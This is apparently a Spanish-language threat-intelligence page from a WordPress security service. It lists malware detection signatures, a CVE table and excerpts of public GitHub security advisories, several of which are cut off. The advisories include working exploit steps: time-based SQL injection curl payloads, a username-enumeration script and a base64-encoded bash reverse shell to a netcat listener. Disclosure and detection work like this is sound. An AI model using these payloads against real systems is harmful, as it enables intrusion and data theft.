PAT-001
CríticaWebshell eval+base64
Webshell clásico que decodifica código PHP ofuscado en runtime.
eval(base64_decode(gzinflate(Backdoor · 95%quarantine
Intel Center
Inteligencia de amenazas. Compartida, no privada.
Todo patrón que detectamos defendiendo un sitio entra al knowledge base público. Todos los sitios protegidos lo aprovechan al mismo tiempo. Actualizado cada 24h — snapshot del 2026-04-20.
10Patrones activos
27CVEs rastreados
40Threats (24h)
2Fuentes activas
Patrones de detección
Top 6 patrones en vigilancia
Cada pattern es una firma lógica (conjunto de indicators) que el scanner evalúa contra cada archivo y request. Confianza expresada 0–1; acción automática al disparar.
PAT-003
CríticaSkimmer de checkout WooCommerce
JavaScript que exfiltra datos de tarjeta desde el checkout.
fetch(XMLHttpRequestinput[name="card"]document.addEventListener('submit'Skimmer · 92%quarantine
PAT-006
CríticaCreación de usuario admin oculto
Creación programática de cuenta con rol administrator.
wp_insert_useradministratoruser_passpersistence · 88%quarantine
PAT-004
CríticaEjecución OS desde PHP
Invocación directa a comandos del sistema operativo.
shell_exec(passthru(system(`$RCE · 85%quarantine
PAT-010
AltaInclude dinámico (LFI/RFI)
Inclusión de archivo controlado por input externo.
include($require($include $_require $_LFI · 90%quarantine
PAT-009
AltaExfiltración vía wp_remote_post
POST saliente con datos codificados — posible exfiltración.
wp_remote_post(base64_encode(\$_POSTexfiltration · 82%flag
CVEs críticos
Vulnerabilidades con exploit público
Subconjunto filtrado por severidad crítica o exploit disponible. Todas se usan para reforzar las reglas de detección en los sitios protegidos.
| CVE | Componente | Severidad | Exploit | Fuentes | Publicado |
|---|---|---|---|---|---|
| CVE-2026-23500 | dolibarr/dolibarr | Crítica | disponible | GitHub Advisory | 17 abr 2026 |
| CVE-2026-31317 | markhuot/craftql | Media | disponible | GitHub Advisory | 17 abr 2026 |
| CVE-2026-40308 | joedolson/my-calendar | Alta | disponible | GitHub Advisory | 16 abr 2026 |
| CVE-2026-24749 | silverstripe/assets | Media | disponible | GitHub Advisory | 16 abr 2026 |
| CVE-2026-31843 | goodoneuz/pay-uz | Crítica | disponible | GitHub Advisory | 16 abr 2026 |
| CVE-2026-40500 | processwire/processwire | Media | disponible | GitHub Advisory | 16 abr 2026 |
| CVE-2026-40486 | kimai/kimai | Media | disponible | GitHub Advisory | 15 abr 2026 |
| CVE-2026-2396 | wordpress | Media | disponible | NVD | 15 abr 2026 |
Resumen diario
Últimas 24 horas · 20 abr 2026
Volumen recopilado de las fuentes activas, desglosado por origen y severidad.
Por fuente
- NVD20 · 50%
- GitHub Advisory20 · 50%
- URLhaus0 · 0%
- WPScan0 · 0%
Por severidad
- Media19 · 48%
- Alta14 · 35%
- Crítica6 · 15%
- Baja1 · 3%
Feed reciente
Últimas 10 amenazas recopiladas
Dump crudo del último threat-collector run. También disponible en RSS — /intel/feed.xml.
- GitHub Advisory18 abr 2026AltaGHSA-f58v-p6j9-24c2
YesWiki vulnerable to authenticated SQL Injection via id_fiche in EntryManager::formatDataBeforeSave()
## Vulnerability Details YesWiki bazar module contains a SQL injection vulnerability in `tools/bazar/services/EntryManager.php` at line 704. The `$data['id_fiche']` value (sourced from `$_POST['id_fiche']`) is concatenated directly into a raw SQL query without any sanitization or parameterization. **Vulnerable Code (EntryManager.php:704):** ```php $result = $this->dbService->loadSingle( 'SELECT MIN(time) as firsttime FROM ' . $this->dbService->prefixTable('pages') . "WHERE tag='" . $data['id_fiche'] . "'" ); ``` **Attack Path:** 1. Attacker authenticates as any user (route requires `acl:{"+"}`) 2. POST `/api/entries/{formId}` with `id_fiche=' OR SLEEP(3) OR '` 3. `ApiController::createEntry()` checks `isEntry($_POST['id_fiche'])` → false (not existing entry) → calls `create()` 4. `create()` → `formatDataBeforeSave()` → SQL injection at line 704 **`dbService->loadSingle()` passes raw string to `mysqli_query()` with no escaping. The `escape()` method exists but is NOT called here.** **Docker PoC confirmation:** - Normal query: `SELECT MIN(time) as firsttime FROM wiki_pages WHERE tag='TestEntry'` → `2024-01-01 00:00:00` - Injected: `WHERE tag='' OR SLEEP(3) OR ''` → **elapsed: 3.00s (SLEEP confirmed)** - Time-based blind SQLi enables full database dump via binary search ## Steps to Reproduce **Prerequisites:** Any authenticated user account on a YesWiki instance with a bazar form (id_typeannonce) created. **Step 1 – Obtain session cookie** (standard login via web UI or API) **Step 2 – Time-based blind SQLi (confirm vulnerability):** ```bash curl -s -X POST 'http://TARGET/?api/entries/1' \ -H 'Cookie: wikini_session=<SESSION>' \ -d "antispam=1&bf_titre=TestTitle&id_fiche=' OR SLEEP(3) OR '" ``` → Response delays ~3 seconds confirming SQL injection. **Step 3 – Error-based SQLi (version exfil):** ```bash curl -s -X POST 'http://TARGET/?api/entries/1' \ -H 'Cookie: wikini_session=<SESSION>' \ -d "antispam=1&bf_titre=TestTitle&id_fiche=' AND extrac
Ver fuente → - GitHub Advisory18 abr 2026AltaGHSA-qrr6-mg7r-m243
PHPUnit has Argument injection via newline in PHP INI values that are forwarded to child processes
## Impact PHPUnit forwards PHP INI settings to child processes (used for isolated/PHPT test execution) as `-d name=value` command-line arguments without neutralizing INI metacharacters. Because PHP's INI parser interprets `"` as a string delimiter, `;` as the start of a comment, and most importantly a newline as a directive separator, a value containing a newline is parsed by the child process as multiple INI directives. An attacker able to influence a single INI value can therefore inject arbitrary additional directives into the child's configuration, including `auto_prepend_file`, `extension`, `disable_functions`, `open_basedir`, and others. Setting `auto_prepend_file` to an attacker-controlled path yields remote code execution in the child process. Sources of INI values that participate in the attack: - `<ini name="…" value="…"/>` entries in `phpunit.xml` / `phpunit.xml.dist` - INI settings inherited from the host PHP runtime via `ini_get_all()` ### Threat Model Exploitation requires the attacker to control the content of an INI value read by PHPUnit. In practice this means write access to the project's `phpunit.xml`, the host `php.ini`, or the PHP binary's environment. The most realistic exposure is [Poisoned Pipeline Execution](https://owasp.org/www-project-top-10-ci-cd-security-risks/CICD-SEC-04-Poisoned-Pipeline-Execution) (PPE): a pull request from an untrusted contributor that modifies `phpunit.xml` to include a newline-containing INI value, executed by a CI system that runs PHPUnit against the PR without isolation. A malicious newline is not visibly distinguishable from a legitimate value in a typical diff review. ### Affected component `PHPUnit\Util\PHP\JobRunner::settingsToParameters()`. ## Patches The fix has two parts: **1. Reject line-break characters** Because a newline or carriage return in an INI value has no legitimate use and is the primitive that enables directive injection, any PHP setting value containing `\n` or `\r` is now reject
Ver fuente → - GitHub Advisory17 abr 2026AltaGHSA-8q4h-8crm-5cvc
elFinder: Command injection in resize background color parameter when using ImageMagick CLI
### Severity **High** `bg` can be injected into shell command construction, leading to possible RCE in affected configurations. ### Summary elFinder contains a command injection vulnerability in the `resize` command. The `bg` (background color) parameter is accepted from user input and passed through image resize/rotate processing. In configurations that use the ImageMagick CLI backend, this value is incorporated into shell command strings without sufficient escaping. An attacker able to invoke the `resize` command with a crafted `bg` value may achieve arbitrary command execution as the web server process user. This issue affects configurations where: - the `resize` command is enabled, - image processing uses the ImageMagick CLI backend, and - the vulnerable code paths are reachable. ### Impact An attacker may execute arbitrary OS commands with the privileges of the web server process. Impact depends on server configuration, enabled commands, backend image library selection, and surrounding deployment controls. ### Affected versions Affected: all versions before <FIXED_VERSION> Patched: <FIXED_VERSION> ### Details The vulnerable flow is: 1. The `resize` command accepts the `bg` parameter from the request. 2. The parameter is passed into volume resize handling. 3. In ImageMagick CLI code paths, the value is interpolated into shell command strings. 4. Because the value is not safely constrained and escaped, shell metacharacters may be injected. The issue was addressed by: - validating `bg` against a strict allowlist of supported color formats, and - safely escaping the value before it is passed into CLI command construction. ### Workarounds Possible mitigations for users who cannot upgrade immediately: - disable the `resize` command if not required, - avoid using the ImageMagick CLI backend for image processing, - restrict access to trusted users only. Upgrading to the patched release is strongly recommended. ### Credits Thanks to Lin, WeiChi
Ver fuente → - GitHub Advisory17 abr 2026BajaGHSA-jrc6-fmhw-fpq2
Kimai: Username enumeration via timing on X-AUTH-USER
## Details `src/API/Authentication/TokenAuthenticator.php` calls `loadUserByIdentifier()` first and only invokes the password hasher (argon2id) when a user is returned. When the username does not exist, the request returns roughly 25 ms faster than when it does. The response body is the same in both cases (`{"message":"Invalid credentials"}`, HTTP 403), so the leak is purely timing. The `/api/*` firewall has no `login_throttling` configured, so the probe is unbounded. The legacy `X-AUTH-USER` / `X-AUTH-TOKEN` headers are still accepted by default in 2.x. No prior authentication, no API token, and no session cookie are required. ## Proof of concept ```python #!/usr/bin/env python3 """Kimai username enumeration via X-AUTH-USER timing oracle.""" import argparse import ssl import statistics import sys import time import urllib.error import urllib.request PROBE_PATH = "/api/users/me" BASELINE_USER = "baseline_no_such_user_zzz" DUMMY_TOKEN = "x" * 32 def probe(url, user, ctx): req = urllib.request.Request( url + PROBE_PATH, headers={"X-AUTH-USER": user, "X-AUTH-TOKEN": DUMMY_TOKEN}, ) t0 = time.perf_counter() try: urllib.request.urlopen(req, context=ctx, timeout=10).read() except urllib.error.HTTPError as e: e.read() return (time.perf_counter() - t0) * 1000.0 def median_ms(url, user, samples, ctx): return statistics.median(probe(url, user, ctx) for _ in range(samples)) def load_candidates(path): with open(path) as f: return [ln.strip() for ln in f if ln.strip() and not ln.startswith("#")] def main(): ap = argparse.ArgumentParser(description=__doc__.strip()) ap.add_argument("-u", "--url", required=True, help="base URL, e.g. https://kimai.example") ap.add_argument("-l", "--list", required=True, metavar="FILE", help="one candidate username per line") ap.add_argument("-t", "--threshold", type=float, default=15.0, metavar="MS",
Ver fuente → - GitHub Advisory17 abr 2026CríticaGHSA-w5j3-8fcr-h87w
Dolibarr: OS Command Injection (RCE) via MAIN_ODT_AS_PDF configuration
### Summary An authenticated administrator can execute arbitrary operating system commands by injecting a malicious payload into the `MAIN_ODT_AS_PDF` configuration constant. This vulnerability exists because the application fails to properly validate or escape the command path before passing it to the `exec()` function in the ODT to PDF conversion process. ### Details The vulnerability is located in `htdocs/includes/odtphp/odf.php`. When the system tries to convert an ODT document to PDF (e.g., in Proposals, Invoices), it constructs a shell command using the `MAIN_ODT_AS_PDF` global setting. Code snippet (`htdocs/includes/odtphp/odf.php`, approx line 930): ```php $command = getDolGlobalString('MAIN_ODT_AS_PDF').' '.escapeshellcmd($name); // ... exec($command, $output_arr, $retval); ``` While the filename `$name` is sanitized using `escapeshellcmd()`, the configuration variable `MAIN_ODT_AS_PDF` is retrieved directly from the database and concatenated at the beginning of the string. An attacker with administrative privileges can set this variable to include a command separator (like `;`) followed by arbitrary commands. ### PoC **Prerequisites:** 1. Login as an Administrator. 2. Ensure the "Commercial Proposals" module is enabled and "ODT templates" are activated in its setup. **Steps to reproduce (Reverse Shell):** 1. Start a netcat listener on the attacker's machine (IP: `172.26.0.1`, Port: `4445`): ```bash nc -lvnp 4445 ``` 2. Prepare the payload. To avoid issues with special characters (like `&` or `>`) being escaped by the web application or shell, encode the reverse shell command in Base64: ```bash # Command: bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1' echo "bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'" | base64 # Output: YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK ``` 3. Navigate to **Home -> Setup -> Other Setup**. 4. Add or modify the constant `MAIN_ODT_AS_PDF` with the following injecti
Ver fuente → - GitHub Advisory17 abr 2026MediaGHSA-8wmw-prw8-2ggm
Craftql vulnerable to Server-Side Request Forgery
Craftql v1.3.7 and before is vulnerable to Server-Side Request Forgery (SSRF) which allows an attacker to execute arbitrary code via the vendor/markhuot/craftql/src/Listeners/GetAssetsFieldSchema.php file.
Ver fuente → - GitHub Advisory16 abr 2026AltaGHSA-2mvx-f5qm-v2ch
Unauthenticated Information Disclosure (IDOR) via Multisite switch_to_blog in My Calendar
### Summary An unauthenticated Insecure Direct Object Reference (IDOR) and Denial of Service (DoS) vulnerability in the My Calendar plugin allows any unauthenticated user to extract calendar events (including private or hidden ones) from any sub-site on a WordPress Multisite network. On standard Single Site WordPress installations, this same endpoint crashes the PHP worker thread, creating an unauthenticated Denial of Service (DoS) vector. ### Details The vulnerability stems from the `mc_ajax_mcjs_action AJAX` function, which handles the `mcjs_action` endpoint. This endpoint is explicitly registered for unauthenticated users: ```php <?php // In my-calendar-ajax.php add_action( 'wp_ajax_nopriv_mcjs_action', 'mc_ajax_mcjs_action' ); ``` When the behavior parameter is set to loadupcoming, the plugin accepts an args parameter from the $_REQUEST array. Instead of validating specific expected arguments, the plugin unsafely passes the entire string into PHP's parse_str() function: ```php <?php $request = isset( $_REQUEST['args'] ) ? wp_unslash( sanitize_text_field( $_REQUEST['args'] ) ) : array(); $request = str_replace( '|', '&', $request ); $request = parse_str( $request, $args ); // ... $response = my_calendar_upcoming_events( $args ); ``` This allows an attacker to inject arbitrary key-value pairs into the $args array. This array is then passed to the my_calendar_upcoming_events() function located in my-calendar-widgets.php. At the beginning of this function, the plugin processes the attacker-controlled site argument: ```php <?php // In my-calendar-widgets.php if ( $args['site'] ) { $args['site'] = ( 'global' === $args['site'] ) ? BLOG_ID_CURRENT_SITE : $args['site']; switch_to_blog( $args['site'] ); } ``` The plugin blindly passes the attacker's supplied site ID into WordPress core's `switch_to_blog()` function without checking if the requesting user has the appropriate network-level privileges (e.g., Super Admin). On Multisite configurations, the datab
Ver fuente → - GitHub Advisory16 abr 2026AltaGHSA-4jjr-vmv7-wh4w
Statamic: Unsafe method invocation via query value resolution allows data destruction
### Impact Manipulating query parameters on Control Panel and REST API endpoints, or arguments in GraphQL queries, could result in the loss of content, assets, and user accounts. The Control Panel requires authentication with minimal permissions in order to exploit. e.g. "view entries" permission to delete entries, or "view users" permission to delete users, etc. The REST and GraphQL API exploits do not require any permissions, however neither are enabled by default. In order to be exploited, they would need to be explicitly enabled with no authentication configured, and the specific resources enabled too. Sites that enable the REST or GraphQL API without authentication should treat patching as critical priority. ### Patches This has been fixed in 5.73.20 and 6.13.0.
Ver fuente → - GitHub Advisory16 abr 2026AltaGHSA-xr6f-h4x7-r6qp
WWBN AVideo: RCE cause by clonesite plugin
Description ## Summary The `cloneServer.json.php` endpoint in the CloneSite plugin constructs shell commands using user-controlled input (`url` parameter) without proper sanitization. The input is directly concatenated into a `wget` command executed via `exec()`, allowing command injection. An attacker can inject arbitrary shell commands by breaking out of the intended URL context using shell metacharacters (e.g., `;`). This leads to **Remote Code Execution (RCE)** on the server. ## Details Inside `plugin/CloneSite/cloneClient.json.php`(line112) didn't have proper sanitization ```php $objClone->cloneSiteURL = str_replace("'", '', escapeshellarg($objClone->cloneSiteURL)); ``` use `str_replace ` make `'` added by `escapeshellarg` become ` ` so hacker can inject evil `cloneSiteURL` to rce ```php $sqlURL = "{$objClone->cloneSiteURL}videos/clones/{$json->sqlFile}"; \\116 $cmd = "wget -O {$sqlFile} {$sqlURL}"; \\117 exec($cmd . " 2>&1", $output, $return_val); \\119 ``` The attack flow 1. make a evil site to provide date 2. add evil url in `objects/pluginAddDataObject.json.php` 3. access `plugin/CloneSite/cloneClient.json.php` to trigger rce ## Poc make a evil site use python like this ```python from flask import Flask, jsonify, request app = Flask(__name__) @app.route('/', defaults={'path': ''}) @app.route('/<path:path>') def catch_all(path): print("PATH:", path) return jsonify({ "error": False, "msg": "", "url": "http://target-site.com/", "key": "target_clone_key", "useRsync": 0, "videosDir": "/var/www/html/AVideo/videos/", "sqlFile": "Clone_mysqlDump_evil123.sql", "videoFiles": [], "photoFiles": [] }) if __name__ == '__main__': app.run(host='0.0.0.0', port=8071) ``` change url with payload like (need admin) ```shell curl -b 'PHPSESSID=<admin_session>' -X POST "http://127.0.0.1/objects/pluginAddDat
Ver fuente → - GitHub Advisory16 abr 2026MediaGHSA-jgcf-rf45-2f8v
Silverstripe Assets Module has a DBFile::getURL() permission bypass
### Impact Images rendered in templates or otherwise accessed via `DBFile::getURL()` or `DBFile::getSourceURL()` incorrectly add an access grant to the current session, which bypasses file permissions. This usually happens when creating an image variant, for example using a manipulation method like `ScaleWidth()` or `Convert()`. Note that if you use `DBFile` directly in the `$db` configuration for a `DataObject` class that doesn't subclass `File`, and if you were setting the visibility of those files to "protected", those files will now need an explicit access grant to be accessed. If you do not want to explicitly provide access grants for these files (i.e. you want these files to be accessible by default), you should use the "public" visibility. ### Reported by Restruct web & apps
Ver fuente →
Paso 1
Recolectamos
Cada 24h el pipeline lee NVD, GitHub Advisory, WPScan y URLhaus. Feedback de sitios Drokio entra al mismo lago.
Paso 2
Consolidamos
Pasos de deduplicación + clustering por plugin. Patrones emergen cuando una señal se repite en N sitios.
Paso 3
Distribuimos
Snapshot público acá + prompt RAG para Drako. Cada sitio protegido ve la misma inteligencia al mismo tiempo.
Tu sitio merece un guardián que nunca duerme.
Mientras leés esto, hay bots escaneando sitios WordPress buscando vulnerabilidades. Drako está listo para defender el tuyo.
7 días de garantía · Cancelá cuando quieras · Soporte WhatsApp